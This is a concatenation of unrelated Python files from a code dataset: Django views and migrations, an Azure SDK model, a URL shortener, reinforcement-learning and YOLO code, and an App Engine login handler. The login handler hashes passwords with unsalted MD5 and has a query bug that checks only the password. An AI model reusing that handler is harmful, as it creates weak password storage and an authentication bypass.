#iterate over the installed applications, locate & concat
#the corresponding global django.po or djangojs.po file
for app_name in settings.INSTALLED_APPS:
local_django = os.path.join(self.po_path, '%s-%s' % (app_name, domain))
if os.path.exists(local_django):
source_files.append(local_django)
concat_message_files(source_files, uni_django_path)
if not has_bom(uni_django_path):
compile_message_file(uni_django_path)
#reset the cached translation messages so that
#we do not need to restart the web server
reset_translations(self.language.name)
messages.add_message(self.request, messages.SUCCESS, _(('The file %(file)s was succesfuly updated.' % { 'file' : self.po_file })))
except:
messages.add_message(self.request, messages.ERROR, _(('The file %(file)s could not be saved.' % { 'file' : self.po_file })))
#save and continue editing
if "_continue" in self.request.POST:
return HttpResponseRedirect('../%s' % self.po_file)
return super(TranslationMessagesEditView, self).form_valid(form)
|
[
"ppetrid@yawd.eu"
] |
ppetrid@yawd.eu
|
50faf2e04d91afe1be4128df90c192dd546b38fe
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-network/azure/mgmt/network/v2018_06_01/models/application_gateway_probe.py
|
d04d03bf97211b720086089e3307cafdb95580c8
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497
| 2019-05-22T00:55:16
| 2019-05-22T00:55:16
| 187,986,993
| 1
| 0
|
MIT
| 2020-10-02T01:17:02
| 2019-05-22T07:33:46
|
Python
|
UTF-8
|
Python
| false
| false
| 4,616
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayProbe(SubResource):
"""Probe of the application gateway.
:param id: Resource ID.
:type id: str
:param protocol: The protocol used for the probe. Possible values are
'Http' and 'Https'. Possible values include: 'Http', 'Https'
:type protocol: str or
~azure.mgmt.network.v2018_06_01.models.ApplicationGatewayProtocol
:param host: Host name to send the probe to.
:type host: str
:param path: Relative path of probe. Valid path starts from '/'. Probe is
sent to <Protocol>://<host>:<port><path>
:type path: str
:param interval: The probing interval in seconds. This is the time
interval between two consecutive probes. Acceptable values are from 1
second to 86400 seconds.
:type interval: int
:param timeout: the probe timeout in seconds. Probe marked as failed if
valid response is not received with this timeout period. Acceptable values
are from 1 second to 86400 seconds.
:type timeout: int
:param unhealthy_threshold: The probe retry count. Backend server is
marked down after consecutive probe failure count reaches
UnhealthyThreshold. Acceptable values are from 1 second to 20.
:type unhealthy_threshold: int
:param pick_host_name_from_backend_http_settings: Whether the host header
should be picked from the backend http settings. Default value is false.
:type pick_host_name_from_backend_http_settings: bool
:param min_servers: Minimum number of servers that are always marked
healthy. Default value is 0.
:type min_servers: int
:param match: Criterion for classifying a healthy probe response.
:type match:
~azure.mgmt.network.v2018_06_01.models.ApplicationGatewayProbeHealthResponseMatch
:param provisioning_state: Provisioning state of the backend http settings
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the probe that is unique within an Application
Gateway.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'protocol': {'key': 'properties.protocol', 'type': 'str'},
'host': {'key': 'properties.host', 'type': 'str'},
'path': {'key': 'properties.path', 'type': 'str'},
'interval': {'key': 'properties.interval', 'type': 'int'},
'timeout': {'key': 'properties.timeout', 'type': 'int'},
'unhealthy_threshold': {'key': 'properties.unhealthyThreshold', 'type': 'int'},
'pick_host_name_from_backend_http_settings': {'key': 'properties.pickHostNameFromBackendHttpSettings', 'type': 'bool'},
'min_servers': {'key': 'properties.minServers', 'type': 'int'},
'match': {'key': 'properties.match', 'type': 'ApplicationGatewayProbeHealthResponseMatch'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewayProbe, self).__init__(**kwargs)
self.protocol = kwargs.get('protocol', None)
self.host = kwargs.get('host', None)
self.path = kwargs.get('path', None)
self.interval = kwargs.get('interval', None)
self.timeout = kwargs.get('timeout', None)
self.unhealthy_threshold = kwargs.get('unhealthy_threshold', None)
self.pick_host_name_from_backend_http_settings = kwargs.get('pick_host_name_from_backend_http_settings', None)
self.min_servers = kwargs.get('min_servers', None)
self.match = kwargs.get('match', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.name = kwargs.get('name', None)
self.etag = kwargs.get('etag', None)
self.type = kwargs.get('type', None)
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
7ea0b2de09aff5bea5badf760e316f5e173859ce
|
70bf8686d8888373d5fd9e484174a165d7d2e8b8
|
/Python/Strings/Text Wrap.py
|
35441d421e6c2df7923894f6751c04ac60899d89
|
[] |
no_license
|
tboztuna/Hackerrank
|
70735da07f239e9e080c00b96e91a03f16f727c6
|
26b16114eb3fb3b9bdb15fb128c00017e1638672
|
refs/heads/master
| 2021-04-29T21:33:17.594166
| 2018-03-05T12:32:53
| 2018-03-05T12:32:53
| 121,618,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
import textwrap
def wrap(string, max_width):
print textwrap.fill(string, max_width)
return ""
if __name__ == '__main__':
string, max_width = raw_input(), int(raw_input())
result = wrap(string, max_width)
print result
|
[
"tolga.boztuna@freebirdairlines.com"
] |
tolga.boztuna@freebirdairlines.com
|
6b8e063df39d1bc4647cc63b5d37bbb741026f94
|
84856442c382b0b670246636d378beb095effa0a
|
/dev_cloud/cc1/pkg/node/usr/sbin/cc1_node_update_config
|
e017f54f299318ea27deee56590d47e9bbbd9034
|
[
"Apache-2.0",
"LicenseRef-scancode-philippe-de-muyter"
] |
permissive
|
Dev-Cloud-Platform/Dev-Cloud
|
f50cc3292245156c4cf55942e4426fda22443fd6
|
b2fb9f4318aeb6dde1e8babca32da527943f1fb4
|
refs/heads/master
| 2020-12-29T02:43:14.022401
| 2017-05-05T07:18:21
| 2017-05-05T07:18:21
| 28,969,864
| 1
| 1
| null | 2015-01-14T16:46:57
| 2015-01-08T14:36:52
|
Python
|
UTF-8
|
Python
| false
| false
| 1,615
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @cond LICENSE
#
# Copyright [2010-2013] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @endcond LICENSE
"""
@author Maciej Nabozny <mn@mnabozny.pl>
"""
import sys
def set_value(key, value):
print "NODE: Updating config: %s:%s" % (key, value)
config = open('/etc/cc1/node/config.py', 'r')
lines = []
for line in config.readlines():
if line[-1] == '\n':
line = line[:-1]
if line.startswith(key):
lines.append(key + '="' + str(value) + '"')
else:
lines.append(line)
config.close()
config = open('/etc/cc1/node/config.py', 'w')
config.write('\n'.join(lines))
config.close()
return 0
if __name__ == "__main__":
try:
if len(sys.argv) == 3:
sys.exit(set_value(sys.argv[1], sys.argv[2]))
else:
print "Usage: %s [key] new_value" % sys.argv[0]
sys.exit(1)
except Exception as e:
print >> sys.stderr, "ERROR: %s" % str(e)
sys.exit(10)
|
[
"michal.szczygiel@wp.pl"
] |
michal.szczygiel@wp.pl
|
|
336a6cde3aa7072a4a9489b56a37cb431e68c47c
|
1c873df0ce730c318428de0abc436a83b34d07b8
|
/blog/migrations/0001_initial.py
|
15a80777e4b151c939f0c559a7af4f88b275b32f
|
[] |
no_license
|
Perceval4/my-first-blog
|
8f8aea387ff479bb7665e8afd557367b72c8fe9d
|
3daa287f3007790a178e5ffecca19d1eb61531a4
|
refs/heads/master
| 2020-03-25T08:58:40.045003
| 2018-08-05T19:08:48
| 2018-08-05T19:08:48
| 143,641,055
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 984
|
py
|
# Generated by Django 2.1 on 2018-08-05 11:49
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"perceval321@gmail.com"
] |
perceval321@gmail.com
|
d862578bb9da5bed1c4f3b517175f68855257486
|
160add72a6907b0967a1249915bc482012dd7130
|
/blog/urls.py
|
998badc7a2ac35e088df0b861ff28af4a96ce2e2
|
[
"MIT"
] |
permissive
|
bencko/test_blog_api
|
b46b7dc21f55897ea7190f9160c3a3a550d797ec
|
5b2c64b6cb54a6e45ef3ab8261372b6040321585
|
refs/heads/main
| 2023-05-02T11:17:04.980376
| 2021-05-24T20:53:33
| 2021-05-24T20:53:33
| 367,986,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
from django.urls import path
from .views import PostCreate, UserPostsView,\
FeedView, SubscribeCreateOrListView,\
SubscribeOperateView, ReadedPostsView
urlpatterns = [
# tested
path(
'',
PostCreate.as_view(),
name='post-create'
),
# tested generation feed
path(
'feed/',
FeedView.as_view(),
name='feed-view'
),
# tested
path(
'<int:pk>/posts/',
UserPostsView.as_view(),
name='user-posts-view'
),
# tested
path(
'subscribes/<int:pk>/',
SubscribeOperateView.as_view(),
name='subscribe-operate-view'
),
# tested
path(
'subscribes/',
SubscribeCreateOrListView.as_view(),
name='subscribe-create-or-list'
),
path(
'readed/',
ReadedPostsView.as_view(),
name='mark-as-readed'
),
]
|
[
"cpaed@yandex.ru"
] |
cpaed@yandex.ru
|
06e2e05fdeafdbbfe6a1accd2104a6c9365ce3df
|
85467153147e81d693a38960d5b5f3304e11e97f
|
/REINFORCE.py
|
89c3c6dadf75b8af87b8c8a59103dc33a1e480bb
|
[] |
no_license
|
asadi8/planning_regularization
|
4cc974fda8b22617105ed09ea5e8390c90af8067
|
c1d145d7551c2cc44563cb8e0b3dc635d4dd958c
|
refs/heads/master
| 2021-01-18T19:00:59.480763
| 2017-03-10T01:31:55
| 2017-03-10T01:31:55
| 84,364,945
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,888
|
py
|
import numpy,sys
import networkActor
import gym
import model
import math
import utils_k
def initializeForLearn(stepSize,numHidden,activation,hiddenSize):
environment='ModelBasedAtariFreeway-v0'
env = gym.make(environment)
obs=env.reset()
state_shape=None
if environment=='CartPole-v0':
state_shape=4
elif environment=='Freeway-v0' or environment=="ModelBasedAtariFreeway-v0":
state_shape=env.observation_space.shape
actor=networkActor.networkLog(state_shape,env.action_space.n,numHidden,activation,hiddenSize,environment)#build actor
return env,actor,[]
def initializeForEpisode(env):
return env.reset(),[],[],[],0
def interactOneEpisode(env,actor):
rep,rewards,reps,actions,t=initializeForEpisode(env)
rep=rep.reshape((1,)+rep.shape)
reps=[]
while True:
print(t)
action=actor.action_selection(rep)
rep_prime,r,done,_= env.step(action)
rep_prime=rep_prime.reshape((1,)+rep_prime.shape)
reps.append(rep),actions.append(action),rewards.append(r)
rep,t=(rep_prime,t+1)
if done==True:
break
returns=utils_k.rewardToReturn(rewards,gamma)
return returns,reps,actions,rewards
def REINFORCEUpdate(actor,returns,reps,actions,num_actions,efficient=True):
weights=actor.model.get_weights()
T=len(returns)
gList=[]
for w in weights:
gList.append(numpy.zeros_like(w))
if efficient and returns[0]<0.1:
return gList
reps=numpy.concatenate(reps,axis=0)
grad=actor.gradient
gradients=grad([reps])
#print(T)
for param_index in range(len(weights)):
#print(gradients[param_index].shape)
grad_param=gradients[param_index]
#print(grad_param.shape)
for t,(G_t,phi_t,a_t) in enumerate(zip(returns,reps,actions)):
gList[param_index]=gList[param_index]+G_t*grad_param[t*num_actions +a_t]
gList[param_index]=gList[param_index]/T
return gList
###parameters
gamma=0.99999
###parameters
def learn(run,
stepSize,numHidden,maxEpisode,activation,hiddenSize,
batchEpisodeNumber):
env,actor,returnPerEpisode=initializeForLearn(stepSize,numHidden,activation,hiddenSize)
deltaList=[]
info=[]
for episode in range(maxEpisode):
print("episode number:",episode)
### interact in the environment for one episode and store relevant information
returns,reps,actions,rewards=interactOneEpisode(env,actor)
print("return:",returns[0])
info.append((returns,reps,actions,rewards))
returnPerEpisode.append(returns[0])
deltaListEpisode=REINFORCEUpdate(actor,returns,reps,actions,env.action_space.n)
deltaList.append(deltaListEpisode)
### interact in the environment for one episode and store relevant information
if (episode+1)%batchEpisodeNumber==0:# if reached the batch episode size
### update actor by learning
actor.update(deltaList,batchEpisodeNumber,stepSize)
deltaList=[]
### update actor by learning
utils_k.printLog(episode,returnPerEpisode,frequency=100)
|
[
"Kavosh@Kavoshs-MacBook-Pro.local"
] |
Kavosh@Kavoshs-MacBook-Pro.local
|
149c0e407620ddb45cf8c46a20ccf64962db7cb5
|
09f94c45b2c3c280890865037b0699059bd5a20c
|
/robust_reset.py
|
9bc7a78386e8483118511681299ed80d96ac0dc1
|
[] |
no_license
|
Vivekyy/robust_domain_adaptation
|
0ec0eb81160923e107032df686520f0f9a1d564a
|
48cf56cf4b9dfe365539b8539062a9ad8b60e890
|
refs/heads/main
| 2023-07-10T06:38:47.416346
| 2021-08-06T20:17:23
| 2021-08-06T20:17:23
| 333,889,707
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 768
|
py
|
import torch
import os
from net import Net
from utils import setDevice
device = setDevice()
def reset(modelPath = None):
if modelPath is None:
modelPath = input("Please enter the path for the model you would like to reset: ")
#Take out _robust
resetTarget = modelPath.split('_')[0] + "_" + modelPath.split('_')[1] + "_" + modelPath.split('_')[2] + ".pt"
if os.path.exists(resetTarget):
ask = input("Would you like to reset to %s? " % resetTarget)
if ask == "y" or ask == "Y":
model = Net().to(device)
model.load_state_dict(torch.load(resetTarget))
torch.save(model.state_dict(), modelPath)
else:
print("No available reset model found")
if __name__ == "__main__":
reset()
|
[
"vivekyanamadula@gmail.com"
] |
vivekyanamadula@gmail.com
|
d1e03cab1e9cddc4c7b1e28758741b3bc57a95b7
|
a7871ac812ca5e3d40881e1815d0fbaf61df4742
|
/nlp_text_summerizer.py
|
d82ec869da99afc4c8f495161dde4792ad2ea335
|
[] |
no_license
|
debnathtanmoy/Streamlit
|
8163de49050d634b5b987c89887d9439750596b0
|
710bc8d24d5d62f28adf23ebe3947d562a0fa820
|
refs/heads/master
| 2022-09-19T06:43:28.461914
| 2020-06-06T12:44:15
| 2020-06-06T12:44:15
| 268,523,657
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,340
|
py
|
import streamlit as st
from gensim.summarization import summarize
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lex_rank import LexRankSummarizer
import spacy
from spacy import displacy
nlp = spacy.load(('en_core_web_sm'))
from bs4 import BeautifulSoup
from urllib.request import urlopen
def sumy_summarizer(docx):
parser = PlaintextParser.from_string(docx,Tokenizer("english"))
lex_summarizer = LexRankSummarizer()
summary = lex_summarizer(parser.document,3)
summary_list = [str(sentence) for sentence in summary]
result = ' '.join(summary_list)
return result
def main():
st.title("Summaryzer and Entity Checker")
activities = ["Summarize","NER Checker","NER For URL"]
choice = st.sidebar.selectbox("Select Activity",activities)
if choice == 'Summarize':
st.subheader("Summarize Document")
raw_text = st.text_area("Enter Text Here","Type Here")
summarizer_type = st.selectbox("Summarizer Type",["Gensim","Sumy Lex Rank"])
if st.button("Summarize"):
if summarizer_type == "Gensim":
summary_result = summarize(raw_text)
elif summarizer_type == "Sumy Lex Rank":
summary_result = sumy_summarizer(raw_text)
st.write(summary_result)
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
200a81f58579323116fcf06d8ac860193ba85b33
|
c954904d3a3259f0bee4bc3942998c30f4714e68
|
/shortener/shorturl/__init__.py
|
841083c46d1e89eca6a52cddcb079e6658197c16
|
[] |
no_license
|
Alodhaib/django-shortener-example
|
9443e51191086fa1321468eb3fdefa137c25e330
|
d037c913ed18e0a7b24865b7f4f5aaf68df2cca3
|
refs/heads/master
| 2021-01-24T10:06:40.965556
| 2013-05-11T16:01:13
| 2013-05-11T16:01:13
| 69,673,280
| 0
| 0
| null | 2016-09-30T14:22:22
| 2016-09-30T14:22:22
| null |
UTF-8
|
Python
| false
| false
| 2,822
|
py
|
#!/usr/bin/env python
#
# Converts any integer into a base [BASE] number. I have chosen 62
# as it is meant to represent the integers using all the alphanumeric
# characters, [no special characters] = {0..9}, {A..Z}, {a..z}
#
# I plan on using this to shorten the representation of possibly long ids,
# a la url shortenters
#
# saturate() takes the base 62 key, as a string, and turns it back into an integer
# dehydrate() takes an integer and turns it into the base 62 string
#
import math
import sys
BASE = 62
UPPERCASE_OFFSET = 55
LOWERCASE_OFFSET = 61
DIGIT_OFFSET = 48
def true_ord(char):
"""
Turns a digit [char] in character representation
from the number system with base [BASE] into an integer.
"""
if char.isdigit():
return ord(char) - DIGIT_OFFSET
elif 'A' <= char <= 'Z':
return ord(char) - UPPERCASE_OFFSET
elif 'a' <= char <= 'z':
return ord(char) - LOWERCASE_OFFSET
else:
raise ValueError("%s is not a valid character" % char)
def true_chr(integer):
"""
Turns an integer [integer] into digit in base [BASE]
as a character representation.
"""
if integer < 10:
return chr(integer + DIGIT_OFFSET)
elif 10 <= integer <= 35:
return chr(integer + UPPERCASE_OFFSET)
elif 36 <= integer < 62:
return chr(integer + LOWERCASE_OFFSET)
else:
raise ValueError("%d is not a valid integer in the range of base %d" % (integer, BASE))
def saturate(key):
"""
Turn the base [BASE] number [key] into an integer
"""
int_sum = 0
reversed_key = key[::-1]
for idx, char in enumerate(reversed_key):
int_sum += true_ord(char) * int(math.pow(BASE, idx))
return int_sum
def dehydrate(integer):
"""
Turn an integer [integer] into a base [BASE] number
in string representation
"""
# we won't step into the while if integer is 0
# so we just solve for that case here
if integer == 0:
return '0'
string = ""
while integer > 0:
remainder = integer % BASE
string = true_chr(remainder) + string
integer /= BASE
return string
if __name__ == '__main__':
# not really unit tests just a rough check to see if anything is way off
if sys.argv[1] == '-tests':
passed_tests = True
for i in xrange(0, 1000):
passed_tests &= (i == saturate(dehydrate(i)))
print passed_tests
else:
user_input = sys.argv[2]
try:
if sys.argv[1] == '-s':
print saturate(user_input)
elif sys.argv[1] == '-d':
print dehydrate(int(user_input))
else:
print "I don't understand option %s" % sys.argv[1]
except ValueError as e:
print e
|
[
"allisson@gmail.com"
] |
allisson@gmail.com
|
b040aa04e941c57f0b76efd18287eec086bd0bc9
|
012205c21ad84a179eedff7f8d64b3239ba1a1bc
|
/dayofthe.py
|
6d359397c192f7066f9eddde30a0e37235bdef7c
|
[] |
no_license
|
choiinsung276/LeetCode
|
9348143f5b1324e84172210f157aedc668939566
|
ab44ef7a8f3df078c6b19c4856a5588052685185
|
refs/heads/master
| 2023-04-03T10:54:55.543322
| 2021-04-12T08:40:15
| 2021-04-12T08:40:15
| 284,418,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 369
|
py
|
import datetime
import time
def dayOfProgrammer(year):
a = datetime.datetime(year,1,1)-datetime.datetime(year,9,1)
b = abs(a).days
sub = 256 - b
result = datetime.datetime(year,9,sub).strftime('%d.%m.%Y')
return result
if __name__ == '__main__':
year = int(input().strip())
result = dayOfProgrammer(year)
print(result)
|
[
"noreply@github.com"
] |
noreply@github.com
|
fb22a1e50b8fb1b3c703961bf05569f450ea295b
|
326a1ae06af70676de27ffafda1846c20e903a25
|
/tiny_yolo_net.py
|
6a0b3132e197c9aca0173c8e060a750e0e3d995e
|
[] |
no_license
|
ximikang/tiny_yolov2_tensorflow
|
bad7c8a04bee6ce403f5f89b92cf91718664a75d
|
31c8a72f6bb532fc348ab0f87a558fc19a97f09d
|
refs/heads/master
| 2020-05-15T15:11:42.506487
| 2019-04-20T14:09:28
| 2019-04-20T14:09:28
| 182,365,328
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,389
|
py
|
import sys, os, time
import math
import tensorflow as tf
import numpy as np
input_height = 416
input_width = 416
bn_epsilon = 1e-3
n_input_imgs = 1
relu_alpha = 0.1
with tf.name_scope('input'):
images = tf.placeholder(tf.float32, shape=[n_input_imgs,
input_height,
input_width,
3])
def weight_variable(shape):
initial = tf.truncated_normal(shape=shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.0, shape=shape)
return tf.Variable(initial)
def max_pool_layer(input_tensor,kernel_size=2,stride=2,padding="VALID"):
pooling_result = tf.nn.max_pool(input_tensor, ksize=[1,kernel_size, kernel_size, 1], strides=[1, stride, stride, 1], padding=padding)
return pooling_result
def leaky_relu(x, alpha=relu_alpha):
#return tf.nn.relu_layer(x, alpha=alpha)
return tf.maximum(alpha * x, x)
def conv2_layer(input_tensor, weight, strides=1,padding='SAME'):
result = tf.nn.conv2d(input_tensor, weight, strides=[strides, strides, strides, strides],
padding=padding)
return result
n_params = 0
#conv1 416*146*3 -> 416*416*16
w1 = weight_variable([3, 3, 3, 16])
b1 = bias_variable([16])
c1 = conv2_layer(images, w1) + b1
conv1 = leaky_relu(c1)
n_params = n_params + 3*3*3*16 + 16*4
#max1 416*416*16 -> 208*208*16
max1 = max_pool_layer(conv1)
#conv3 208*208*16 -> 208*208*32
w2 = weight_variable([3, 3, 16, 32])
b2 = bias_variable([32])
c2 = conv2_layer(max1, w2) + b2
conv2 = leaky_relu(c2)
n_params = n_params + 3*3*16*32 + 32*4
#max4 208*208*32 -> 104*104*32
max2 = max_pool_layer(conv2)
#conv5 104*104*32 -> 104*104*64
w3 = weight_variable([3, 3, 32, 64])
b3 = bias_variable([64])
c3 = conv2_layer(max2, w3) + b3
conv3 = leaky_relu(c3)
n_params = n_params + 3*3*32*64 + 64*4
#max6 104*104*64 -> 52*52*64
max3 = max_pool_layer(conv3)
#conv7 52*52*64 -> 52*52*128
w4 = weight_variable([3, 3, 64, 128])
b4 = bias_variable([128])
c4 = conv2_layer(max3, w4) + b4
conv4 = leaky_relu(c4)
n_params = n_params + 3*3*64*128 + 128*4
#max8 52*52*128 -> 26*26*128
max4 = max_pool_layer(conv4)
#conv9 26*26*128 -> 26*26*256
w5 = weight_variable([3, 3, 128, 256])
b5 = bias_variable([256])
c5 = conv2_layer(max4, w5) + b5
conv5 = leaky_relu(c5)
n_params = n_params + 3*3*128*256 + 256*4
#max10 26*26*256 -> 13*13*256
max5 = max_pool_layer(conv5)
#conv11 13*13*256 -> 13*13*512
w6 = weight_variable([3, 3, 256, 512])
b6 = bias_variable([512])
c6 = conv2_layer(max5, w6) + b6
conv6 = leaky_relu(c6)
n_params = n_params + 3*3*256*512 + 512*4
#max12 13*13*512 -> 13*13*512
max6 = max_pool_layer(conv6, kernel_size=2, stride=1, padding='SAME')
#conv13 13*13*512 -> 13*13*1024
w7 = weight_variable([3, 3, 512, 1024])
b7 = bias_variable([1024])
c7 = conv2_layer(max6, w7) + b7
conv7 = leaky_relu(c7)
n_params = n_params + 3*3*512*1024 + 1024*4
###############################
#conv14 13*13*1024 -> 13*13*1024
w8 = weight_variable([3, 3, 1024, 1024])
b8 = bias_variable([1024])
c8 = conv2_layer(conv7, w8) + b8
conv8 = leaky_relu(c8)
n_params = n_params + 3*3*1024*1024 + 1024*4
#conv1 13*13*1024 -> 13*13*125
w9 = weight_variable([1, 1, 1024, 125])
b9 = bias_variable([125])
net_out = conv2_layer(conv8, w9) + b9
n_params = n_params + 1*1*1024*125 + 125
|
[
"ximikang@outlook.com"
] |
ximikang@outlook.com
|
a993b8752d0dd150150559856ca00158b1dc84b1
|
96993d530a3bdc13bb307afac3eb1081425e36ea
|
/30 Days Challenge/19.py
|
e46d10a0a741217e8cb47289a88d6a117cb20b43
|
[] |
no_license
|
mayankkgandhi/Coding-Challenges
|
bea5e317bb93cbdd17c6b31355f2771a6d01c26c
|
6c99e74d0996a1aebe5efadb00cce4d9458182fb
|
refs/heads/master
| 2021-01-21T17:28:31.876351
| 2018-06-01T06:11:43
| 2018-06-01T06:11:43
| 85,462,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
class Solution:
# Write your code here
def __init__(self):
self.stack=[]
self.queue=[]
def pushCharacter(self,item):
self.stack.append(item)
def enqueueCharacter(self,item):
self.queue.append(item)
def popCharacter(self):
return self.stack.pop()
def dequeueCharacter(self):
return self.queue.pop(0)
|
[
"noreply@github.com"
] |
noreply@github.com
|
dd2fd62056c6386cf4a8440a07cb3d3e6503200e
|
2284d84f45d11386a0754554d335942b48f0c0b2
|
/fall 2015 OSU/Predoviv_CS496_FinalProject_Fall2015/_CS496_CloudFinal_Fall2015_predoviv/UserAuth.py
|
a4adc2a4ce5e6da13606e8fe8f7952bdc2ba4af0
|
[] |
no_license
|
Vladis466/Homework
|
d2db6a81e8dd672fdb87ddfc18990f2e99b5cbd3
|
c7d94f722808bf0d9b3edd25fe27a8e557989ac9
|
refs/heads/master
| 2020-04-12T08:57:42.445384
| 2016-12-23T03:28:53
| 2016-12-23T03:28:53
| 38,588,792
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,969
|
py
|
import webapp2
from google.appengine.ext import ndb
import db_models
import json
from datetime import datetime
import hashlib
class userAuth(webapp2.RequestHandler):
def post(self):
# create channel entity
# POST body variables
# name - required Channel name
# procs[] - Array of procedure ids
# user - current user running a study
if 'application/json' not in self.request.accept:
self.response.status = 406
self.response.status_message = 'Not Acceptable, API only supports application/json MIME type'
return
newUser = db_models.appUsers()
Uname = self.request.get('userName', default_value = None)
Upass = hashlib.md5(self.request.get('passWord', default_value = None)).hexdigest()
Choice = self.request.get('Choice', default_value = None)
existCheck = db_models.appUsers.query(db_models.appUsers.userName == Uname).fetch()
logCheck = db_models.appUsers.query(db_models.appUsers.userName == Uname and db_models.appUsers.passWord == Upass).fetch()
#Make sure that the instance we are creating doesn't allready exist as a user
#Then proceed to login or register
if Choice == 'Register':
if existCheck:
self.response.status = 400
self.response.status_message = 'Invalid request. User already exists'
self.response.write('nope')
else:
newUser.userName = Uname
newUser.passWord = Upass
key = newUser.put()
out = newUser.to_dict()
self.response.write('Registered')
if Choice == 'Login':
#make sure the name and password match
if logCheck:
self.response.write('yes')
self.response.status_message = 'Succesfull Login!!'
else:
self.response.write('no')
self.response.status_message = 'Bad credentials!!'
return
return
def get(self, **kwargs):
if 'application/json' not in self.request.accept:
self.response.status = 406
self.response.status_message = 'Not Acceptable, API only supports application/json MIME type'
return
#Were looking for id in keyword arguments. We make a key for the mod by passing it a type.
#From the key we get the mod and turn it into a dictionary. We then dump that to a string and
#write that back as a response.
q = db_models.appUsers.query()
x = q.fetch()
keys = q.fetch(keys_only = True)
results = {'keys': [x.id() for x in keys]}
#self.response.write(json.dumps(results))
#self.response.write('<br><br>')
for a in keys:
Inst = a.get()
self.response.write(Inst)
self.response.write('<br><br>')
|
[
"predovic900@gmail.com"
] |
predovic900@gmail.com
|
567ce10d50799ef515908a632d690c0a82e045ba
|
8ec08780863a056c7eab0b653eb79ee0abb228a9
|
/2/example_2/manage.py
|
cf6f0460ae4ce8ea53be03553fd85e5de00e42b1
|
[] |
no_license
|
mikolaz27/itvdn_essential
|
f38483853fb802c52032547301cf06073b9dda03
|
7c7b401fcea237589fc08acfc52094c3e808e6cb
|
refs/heads/main
| 2023-05-08T06:43:56.420849
| 2021-05-30T14:49:47
| 2021-05-30T14:49:47
| 372,226,821
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 629
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'example_2.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"mikolaz2727@gmail.com"
] |
mikolaz2727@gmail.com
|
d46ddaa64e3b6baa8dd6e9f533ac94ef9cd35e2b
|
a66ce923327975ccaaa4f66e1f55afa2e4b448ac
|
/Store/account/forms.py
|
c34d44b8e4898920f3b6551fe009d0d4fafec21b
|
[] |
no_license
|
Digindataflow/Front-end-UI-framework
|
506878b41cb9f373216381fe9a10b831fff985cd
|
901aaa2c168305a0a674ba79e74a48e5ab8dedcc
|
refs/heads/master
| 2020-04-18T23:24:02.443405
| 2019-04-09T19:14:31
| 2019-04-09T19:14:31
| 167,820,508
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,803
|
py
|
import logging
from django import forms
from django.contrib.auth import authenticate
from django.contrib.auth.forms import \
UserCreationForm as DjangoUserCreationForm
from django.contrib.auth.forms import UsernameField
from account import models
